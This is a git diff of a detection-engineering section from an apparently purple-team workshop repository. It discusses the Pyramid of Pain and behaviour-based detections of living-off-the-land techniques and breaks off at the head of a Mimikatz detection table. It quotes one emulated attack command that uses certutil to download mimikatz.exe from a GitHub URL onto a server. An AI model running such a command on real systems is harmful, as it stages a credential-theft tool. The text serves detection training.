tscomm99/purple-team-workshop-2025-01/detection_engineering.md

 In this section, we'll review opportunities in the workshop and approaches in general to improve the effectiveness of our detection apparatus.

 ## What is under attacker control
 The threat actor chose to use LOLBIN as part of their tooling.
-The TTPs vary in terms of complexity (additional stealth) and associated detection opportunities (behavior vs signature).
+Rules triggered by elements under attacker control are likely to have a shorter lifetime than those based on behaviors, we need to know where we are on the Pyramid of Pain.
+The TTPs vary in terms of complexity (resulting in greater stealth) and associated detection opportunities ( identify a behavior rather than a signature such as filename or checksum).
+Let's dissect what was ran to emulates some of the threat actor activities.
 ```
 [ITSERVER:PowerShell] certutil -urlcache -f https://github.com/MihhailSokolov/SecTools/raw/main/mimikatz.exe C:\Temp\m.exe
 ```
 ## What did we actually look for
-Rules triggered by elements under attacker control are likely to have a shorter lifetime than those based on behaviors, we need to know where we are on the Pyramid of Pain.

 ### Mimikatz
 | # | Search | ATT&CK Techniques | Notes | Dependencies |